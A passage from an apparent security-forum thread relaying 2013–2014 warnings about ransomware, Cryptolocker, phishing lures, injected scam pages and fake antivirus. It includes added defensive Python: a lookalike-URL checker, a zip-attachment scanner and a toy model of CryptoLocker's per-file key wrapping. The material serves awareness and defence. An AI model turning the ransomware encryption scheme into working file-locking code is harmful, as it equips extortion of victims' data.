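Assumptions: PUBLIC_SUFFIXES is a constructed subset of the real Public
Suffix List; looks_like() and registrable_domain() are names chosen here,
not from the post."""
from urllib.parse import urlsplit

# Constructed subset of the Public Suffix List (assumption for offline use).
PUBLIC_SUFFIXES = {"com", "net", "org", "gov", "co.uk", "gov.uk"}


def registrable_domain(hostname: str) -> str:
    """Return the public suffix plus one label, e.g. 'k8381.com' or 'example.co.uk'."""
    labels = hostname.lower().rstrip(".").split(".")
    # Walk from the full name inward so the longest matching suffix wins.
    for i in range(len(labels)):
        suffix = ".".join(labels[i:])
        if suffix in PUBLIC_SUFFIXES:
            if i == 0:
                return suffix          # the hostname *is* a public suffix
            return ".".join(labels[i - 1:])
    return ".".join(labels[-2:])       # unknown TLD: fall back to the last two labels


def looks_like(url: str, trusted_domain: str) -> dict:
    """Classify a URL against the domain it visually claims to belong to."""
    trusted = trusted_domain.lower()
    host = (urlsplit(url).hostname or "").lower()
    reg = registrable_domain(host)
    genuine = reg == trusted
    return {
        "host": host,
        "registrable": reg,
        "genuine": genuine,
        # The scareware pattern: the trusted name appears only as leading labels.
        "lookalike": (not genuine) and host.startswith(trusted + "."),
    }


if __name__ == "__main__":
    print(looks_like("http://fbi.gov.id657546456-3999456674.k8381.com/", "fbi.gov"))
    print(looks_like("https://www.fbi.gov/contact-us", "fbi.gov"))
```

Reading the rightmost labels first is the whole point: browsers, certificates and DNS all treat "k8381.com" as the owner of that page, and nothing to the left of it is under the FBI's control.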

#40 AplusWebMaster

Posted 30 July 2013 - 01:11 PM

FYI...

DHS-themed ransomware - in the wild...
- https://www.us-cert....nsomware-UPDATE
July 30, 2013 - "US-CERT has received reports of increased activity concerning an apparently DHS-themed ransomware malware infection occurring in the wild. Users who are being targeted by the ransomware receive a message claiming that use of their computer has been suspended and that the user must pay a fine to unblock it. One iteration of this malware also takes a webcam (if available) photo or video of a recipient and posts it in a pop-up to add to the appearance of legitimacy. The ransomware -falsely- claims to be from the U.S. Department of Homeland Security and the National Cyber Security Division. Users who are infected with the malware should consult with a reputable security expert to assist in removing the malware..."
 

:ph34r: :ph34r:




#41 AplusWebMaster

Posted 22 August 2013 - 12:28 PM

FYI...

Chinese Ransomlock malware changes Windows Login Credentials
- http://www.symantec....gin-credentials
21 Aug 2013 - "... new type of ransomlock malware that not only originates from China but also uses a new ransom technique to force users into paying to have their computers unlocked. This threat is written in Easy Programming Language and is spread mostly through a popular Chinese instant messaging provider. Once a computer is compromised, the threat changes the login credentials of the current user and restarts the system using the newly created credentials. The login password is changed to “tan123456789” (this was hardcoded in the sample we acquired) but the malware author may update the threat and change the password. The account name is changed to “contact [IM ACCOUNT USER ID] if you want to know the password” (English translation) so that once the computer has restarted, and the user is unable to log in, they will see the account name/message and contact the user ID in order to get the new password.
Login screen with changed account name after system restart
> https://www.symantec...igure1_Edit.png
If the victim contacts the provided user ID, who is more than likely the malware author, they will see a statement on the profile page asking for approximately 20 Chinese Yuan (US$3.25). The statement says that the login password will be sent as soon as the money is received and that if the malware author is pestered by the user they will be blocked. Symantec detects this threat as Trojan.Ransomlock.AF. For users already infected with this threat, there are several ways to restore system access:
1. Use password “tan123456789” to log into the system and reset the password (as mentioned before, this might -not- always work as the password may be changed by the malware author)
2. Use another administrator account to log into the system and reset the password
3. If your current account is not a super administrator account, enter safe mode and log in as super administrator and then reset the password
4. Use Windows recovery disk to reset the password."
___

Spear-Phishing E-mail with Missing Children Theme
- https://www.us-cert....-Children-Theme
August 22, 2013 - "The FBI is aware of a spear-phishing e-mail appearing as if it were sent from the National Center for Missing and Exploited Children. The subject of the e-mail is "Search for Missing Children," and a zip file containing 3 malicious files is attached. E-mail recipients should always treat links and attachments in unsolicited or unexpected e-mail with caution."
 

:grrr: :ph34r:


Edited by AplusWebMaster, 22 August 2013 - 12:55 PM.



#42 AplusWebMaster

Posted 17 October 2013 - 01:20 PM

FYI...

Cryptolocker ransomware
- http://arstechnica.c...00-in-bitcoins/
Oct 17 2013 - "Malware that takes computers hostage until users pay a ransom is getting meaner, and thanks to the growing prevalence of Bitcoin and other digital payment systems, it's easier than ever for online crooks to capitalize on these "ransomware" schemes. If this wasn't already abundantly clear, consider the experience of Nic, an Ars reader who fixes PCs for a living and recently helped a client repair the damage inflicted by a particularly nasty title known as CryptoLocker. It started when an end user in the client's accounting department received an e-mail purporting to come from Intuit. Yes, the attached archived zip file with an executable inside should have been a dead giveaway that this message was malicious and was in no way affiliated with Intuit. But accounting employees are used to receiving e-mails from financial companies. When the receiver clicked on it, he saw a white box flash briefly on his screen but didn't notice anything else out of the ordinary. He then locked his computer and attended several meetings. Within a few hours, the company's IT department received word of a corrupt file stored on a network drive that was available to multiple employees, including the one who received the malicious e-mail. A quick investigation soon uncovered other corrupted files, most or all of which had been accessed by the accounting employee. By the time CryptoLocker had run its course, hundreds of gigabytes worth of company data was no longer available..."
> http://cdn.arstechni...ot1-640x498.jpg

Cryptolocker Prevention Kit
- http://www.thirdtier...prevention-kit/
Oct 14, 2013 - "The SMBKitchen Crew and Third Tier staff have put together a group of materials that were published as part of our SMBKitchen Project and only available to subscribers. However, because this virus is spreading so rapidly and is so serious, we’ve decided to make these materials available to everyone. The kit includes an article on cleaning up after infection but more importantly provides materials and instruction for deploying a preventative block using software restriction policies. The articles provide instruction for installing them via GPO on domain computers and terminal servers, and non-domain joined machines too. We have also provided GPO settings that you can import into your environment. We’ve zipped it up into a single file. Download it now*"
* http://www.thirdtier...eventionKit.zip
___

- http://atlas.arbor.n...ndex#1331587000
High Severity
21 Oct 2013
The CryptoLocker ransomware has been popular lately. Several serious outbreaks have taken place and this threat is harder to recover from unless proactive measures have been taken.
Source: http://nakedsecurity...p-and-recovery/

- http://windowssecret...rnicious-virus/
Oct 23, 2013

- https://isc.sans.edu...l?storyid=16871
Last Updated: 2013-10-22 14:09:38 UTC

CryptoLocker: Its Spam and ZeuS/ZBOT Connection
- http://blog.trendmic...bot-connection/
Oct 21, 2013 - "... the CryptoLocker malware that not only blocks access to the system, but also forces users to buy a $300 decrypting tool by locking or encrypting specific files in the system. Recently, we were alerted to a spam campaign that we determined to be responsible for CryptoLocker infections. The spammed messages contain malicious attachments belonging to TROJ_UPATRE, a malware family characterized by its small file size and simple downloading function. Using feedback provided by the Trend Micro Smart Protection Network, we searched for information linking CryptoLocker ransomware to this downloader and came across a sample email containing a malicious attachment (detected as TROJ_UPATRE.VNA):
(Screenshot of spam with malicious attachment)
> http://blog.trendmic...ryptolocker.jpg
Once this attached file is executed, it connects to a URL to download another file, which is saved as cjkienn.exe (detected as TSPY_ZBOT.VNA). This malware then downloads the actual CryptoLocker malware (detected as TROJ_CRILOCK.NS).
(CryptoLocker infection chain)
> http://blog.trendmic...lock_edited.jpg
This threat is particularly troublesome for several reasons. First, ZeuS/ZBOT variants are known to steal information related to online banking credentials. The attackers can use the stolen information to start unauthorized banking transactions. Furthermore, because of the CryptoLocker malware, users will be unable to access their personal or important documents... Although the ransom note in CryptoLocker only specifies “RSA-2048” as the encryption used, our analysis shows that the malware uses AES + RSA encryption. RSA is asymmetric key cryptography, which means it uses two keys. One key is used to encrypt the data and another is used to decrypt the data. (One key is made available to any outside party and is called the public key; the other key is kept by the user and is called the private key.) AES uses symmetric keys (i.e., the same key is used to encrypt and decrypt information). The malware uses an AES key to encrypt files. The AES key for decryption is written in the files encrypted by the malware. However, this key is encrypted with an RSA public key embedded in the malware, which means that a private key is needed to decrypt it. Unfortunately, the said private key is not available. For information on which files are encrypted, users can check their system’s autostart registry.
> http://blog.trendmic...ryptolocker.jpg
... It is also important for users to be cautious when opening any attachments from email messages coming from unknown sources. Email reputation service also blocks the spam related to this threat."
 

:ph34r: :ph34r:


Edited by AplusWebMaster, 24 October 2013 - 10:21 AM.


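Added example, not CryptoLocker code and not from the Trend Micro analysis quoted above: a stand-alone model of the key-wrapping scheme that analysis describes (a fresh symmetric key per file, stored in the encrypted file but wrapped with an RSA public key embedded in the malware), to show concretely why the victim cannot recover anything without the attacker's private key. So that it runs on the Python standard library alone it assumes textbook RSA over a constructed, deliberately tiny key pair (insecure; real CryptoLocker embedded an RSA-2048 key) and a SHA-256 counter-mode keystream standing in for AES. The structure, not the primitives, is what it demonstrates; all function names are chosen here.

```python
"""Added example: per-file key wrapped under an embedded RSA public key.

Assumptions: toy RSA primes (1000003, 1000033), a SHA-256 keystream in place
of AES, and a made-up "CLK1" header; none of this is CryptoLocker's format."""
import hashlib
import os
import struct

KEY_BYTES = 16        # per-file symmetric key length
CHUNK = 4             # key bytes wrapped per RSA operation (2**32 < n for the toy modulus)
WRAPPED_CHUNK = 8     # storage width of one RSA ciphertext (n < 2**40 fits)


def stream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in for AES: XOR with a SHA-256(key || counter) keystream. Symmetric."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hashlib.sha256(key + struct.pack(">Q", offset // 32)).digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], block))
    return bytes(out)


def rsa_keypair():
    """Constructed toy key pair: (n, e) is what the malware ships, (n, d) stays with the attacker."""
    p, q = 1000003, 1000033
    n, phi = p * q, (p - 1) * (q - 1)
    e = 65537
    d = pow(e, -1, phi)                       # modular inverse, Python 3.8+
    return (n, e), (n, d)


def wrap_key(file_key: bytes, public_key) -> bytes:
    """Encrypt the per-file key chunk-wise with the public key (only the public key is needed)."""
    n, e = public_key
    out = b""
    for i in range(0, len(file_key), CHUNK):
        m = int.from_bytes(file_key[i:i + CHUNK], "big")   # m < 2**32 < n
        out += pow(m, e, n).to_bytes(WRAPPED_CHUNK, "big")
    return out


def unwrap_key(wrapped: bytes, private_key) -> bytes:
    """Recover the per-file key; requires d, which the victim never has."""
    n, d = private_key
    out = b""
    for i in range(0, len(wrapped), WRAPPED_CHUNK):
        m = pow(int.from_bytes(wrapped[i:i + WRAPPED_CHUNK], "big"), d, n)
        # With a wrong d, m falls outside the chunk range: mask it so the caller
        # gets garbage bytes (a failed decryption) rather than an exception.
        out += (m & ((1 << (8 * CHUNK)) - 1)).to_bytes(CHUNK, "big")
    return out


def encrypt_file(plaintext: bytes, public_key) -> bytes:
    """What the malware does per file: new random key, wrapped key stored inline, body encrypted."""
    file_key = os.urandom(KEY_BYTES)
    return b"CLK1" + wrap_key(file_key, public_key) + stream_xor(file_key, plaintext)


def decrypt_file(blob: bytes, private_key) -> bytes:
    """What only the private-key holder can do: unwrap the file key, then decrypt the body."""
    if blob[:4] != b"CLK1":
        raise ValueError("not an encrypted file from this demo")
    wrapped_len = (KEY_BYTES // CHUNK) * WRAPPED_CHUNK
    wrapped, body = blob[4:4 + wrapped_len], blob[4 + wrapped_len:]
    return stream_xor(unwrap_key(wrapped, private_key), body)


if __name__ == "__main__":
    pub, priv = rsa_keypair()
    blob = encrypt_file(b"Q3 ledger (constructed sample)", pub)
    print(decrypt_file(blob, priv))
```

Two things to notice when running it: every call to encrypt_file produces a different wrapped key and body for the same input, so there is no reusable key to extract from one recovered file, and the only material on the victim's machine is the public key, which wraps keys but cannot unwrap them. With a 2048-bit modulus instead of this toy one, factoring n to get d is not an option either, which is why the backups and software-restriction policies in the posts above matter more than any after-the-fact recovery.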

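Added example, not from the Ars Technica, Trend Micro or US-CERT items quoted above: both the Intuit-themed CryptoLocker mail and the "Search for Missing Children" spear-phish in #41 deliver a zip attachment whose members are executables, often under a document-looking name. This is a mail-gateway style check for that pattern: it inspects each archive member's extension, double extension and first two bytes (the "MZ" DOS/PE magic) and reports findings. The sample archive is constructed in memory; the member names and filler bytes are made up for the demo, and the function names are chosen here.

```python
"""Added example: flag zip attachments that carry executables.

Assumptions: the sample zip, its member names and its filler bytes are
constructed for this demo; the extension lists are a practical starting set."""
import io
import zipfile

EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def analyse_zip_attachment(data: bytes) -> list:
    """Return (member_name, reason) findings; an empty list means nothing suspicious."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<attachment>", "not a valid zip archive")]
    for info in zf.infolist():
        name = info.filename
        base = name.lower().rsplit("/", 1)[-1]          # ignore any directory part
        parts = base.split(".")
        ext = "." + parts[-1] if len(parts) > 1 else ""
        if ext in EXECUTABLE_EXTENSIONS:
            findings.append((name, f"executable extension {ext}"))
            # invoice.pdf.exe: a document extension hiding in front of the real one
            if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTENSIONS:
                findings.append((name, "document-looking double extension"))
        if ext == ".zip":
            findings.append((name, "nested archive"))
        # Extension lies are cheap; the file header is harder to fake.
        with zf.open(info) as member:
            head = member.read(2)
        if head == b"MZ" and ext not in EXECUTABLE_EXTENSIONS:
            findings.append((name, "PE/DOS header under a non-executable name"))
    return findings


def build_sample_zip() -> bytes:
    """Constructed lure archive for the demo: one double-extension exe, one mislabelled exe, one clean text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice.pdf.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("scan.pdf", b"MZ" + b"\x00" * 62)
        zf.writestr("readme.txt", b"Please open the attached invoice.")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in analyse_zip_attachment(build_sample_zip()):
        print(f"{member}: {reason}")
```

The header check is what catches the second member: renaming an executable to .pdf defeats an extension filter but not a look at the first two bytes, and the same idea extends to checking that a .pdf really starts with "%PDF". Blocking at the gateway is cheaper than the cleanup the Ars reader describes, and it is independent of whether the endpoint AV has a signature yet.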
#43 AplusWebMaster

Posted 29 October 2013 - 07:13 AM

FYI...

GWload - Mass Injection making its rounds ...
- http://community.web...its-rounds.aspx
29 Oct 2013 - "... a new mass injection campaign is making its rounds, compromising and injecting content into tens of thousands of legitimate websites... Our telemetry shows that, to date, at least 40,000 compromised pages have occurred on the Web, redirecting and tricking users to install rogue software. We see parallels of the injected websites with websites that were affected by the "cookiebomb" mass injection, which was mostly associated with delivering "ransomware" payloads...
Number of injected web pages spotted in the last 7 days:
> http://community.web...7_5F00_days.jpg
Users who browse to a compromised injected website are immediately redirected 'drive-by' style to a second compromised website that (a) effectively blocks all content of the legitimate website and (b) shows them this notification: "VLC player is required for this website, click DOWNLOAD NOW". VLC media player is a legitimate open source media player (the official page is located here*). However, VLC player is also known to be abused and bundled with some non-legitimate software, and this is the case with -all- the "VLC media player" installations that take part in this mass injection campaign... The lure - how content is 'locked' with conditional access; this is what the user sees when browsing to an injected website:
> http://community.web...plashscreen.jpg
... If a user is convinced that it is necessary to download and run the file to access the website's content, then unexpected, -rogue- installations of software will commence on the user's machine... Looks like "VLC Player" Installation, but the small print allows for some extras:
> http://community.web...splashcreen.jpg
... We noticed that this mass injection uses a social engineering trick that locks legitimate websites' content to lure potential victims to install applications that participate in Cost Per Action (CPA) advertising schemes. This change in tactics that occurred in the past two weeks coincides with the arrest of the Blackhole Exploit Kit author 'Paunch,' which could suggest that actors adapt to change rapidly to keep their attack going. It was also apparent that certain scripts used by actors to serve social engineering-based attack vectors are interchangeable across different attack platforms; we witnessed with 'GWload' that code that mostly was used in social engineering-based attacks on -Facebook- has now migrated and is used with mass injections..."
* http://www.videolan.org/
 

:grrr: :ph34r:




#44 sandra lora

Posted 22 November 2013 - 05:35 AM

That scamware often sends spam email to your mailbox; the links inside the emails are often infected with viruses. If you receive the spam emails, you'd better not open them or click the links, otherwise your PC will easily be infected.



#45 AplusWebMaster

Posted 01 February 2014 - 06:59 AM

FYI...

DailyMotion infected - serving Fake AV Malware
- http://threatpost.co...-malware/104003
Jan 31, 2014 - "More than three weeks after notifying video-sharing site DailyMotion that it was compromised, security company Invincea reports the popular website is -still- infected. A spokesperson told Threatpost that Invincea’s original notification was not acknowledged and the company suspects this is a continuation of the same attack and the site was never cleaned up. Invincea said it has again notified DailyMotion, which is the 96th most popular destination on the Internet according to Alexa. The site allows users to upload and share videos. The attack was originally reported Jan. 7* when malicious ads were discovered on the site. Those ads were -redirecting- visitors to a fake AV scam. Invincea said today** that the same threat is happening on the site... a visitor is presented with a dialog box warning the user that “Microsoft Antivirus” found a problem on the victim’s computer and that it needs to be cleaned. A list of potential problems is shown next and the user is enticed to run an executable pretending to be security software... With fake AV scams, victims are tricked into installing what they think is security software but is instead malware. They’re then informed they must purchase a subscription of some kind in order to clean the computer of the infection..."
* http://www.invincea....fake-av-threat/
Jan 7, 2014

** http://www.invincea....-fakeav-threat/
Jan 31, 2014

 

FakeAV Threat ...
- https://www.youtube....xKmAsSzJv0#t=38
Jan 31, 2014 Video 1:26
 

93.115.82.246
- https://www.virustot...46/information/

2014-02-04
___

- https://net-security...ews.php?id=2697
Feb 3, 2014 - "... Not only do the victims get saddled with malware, but they are likely to pay for the "full version" of the fake AV (some $100) and have their credit card details stolen in the process... the malware served in this attack is still detected only by a handful of commercial AV solutions, so avoiding DailyMotion's website is a good idea for now."
 

:ph34r: :ph34r: :grrr:


Edited by AplusWebMaster, 04 February 2014 - 11:23 AM.



#46 AplusWebMaster

Posted 31 October 2014 - 09:31 PM

FYI...

Rogue AV still finds a niche...
- http://www.threattra...ll-finds-niche/
Oct 31, 2014 - "... recently observed the Asprox botnet distributing malicious spam – like the image below of a purported WhatsApp voicemail notification – with attachments infected with Kuluoz, a downloader for Asprox, that is used to drop affiliate payloads onto PCs.
WhatsApp spam delivers Kuluoz downloader dropping Rango Rogue AV:
> http://www.threattra...atsApp-Spam.jpg
Kuluoz dropping Rango - rogue AV from the Fakerean family of rogues:
> http://www.threattra...4/10/Rango1.png
Once infected with Rango – which can dynamically change its name depending on the OS environment in which it is installed – it will begin alerting users that their machine is infected with malware and directing them to purchase Rango.
Rango generates dire warnings designed to scare users into purchasing false protection:
> http://www.threattra...4/10/Rango3.png
Victims who make it this far - hand over their credit card information...:
> http://www.threattra...4/10/Rango4.png
Rango even goes as far as to create a fake Windows Action Screen to help persuade users into accepting it as a recognized and trusted antivirus program... Rango also stops users from running applications, falsely claiming they are malicious... users who mistakenly -pay- the ransom for Fakerean rogues typically download an .exe file which removes any fake files and stops blocking access to applications. Subsequent “scans” with the rogue typically will not show any future false detections. A ThreatAnalyzer dynamic malware analysis report of Rango is available here*."
* http://www.threattra...is-fakerean.pdf
 

:ph34r:  :grrr:






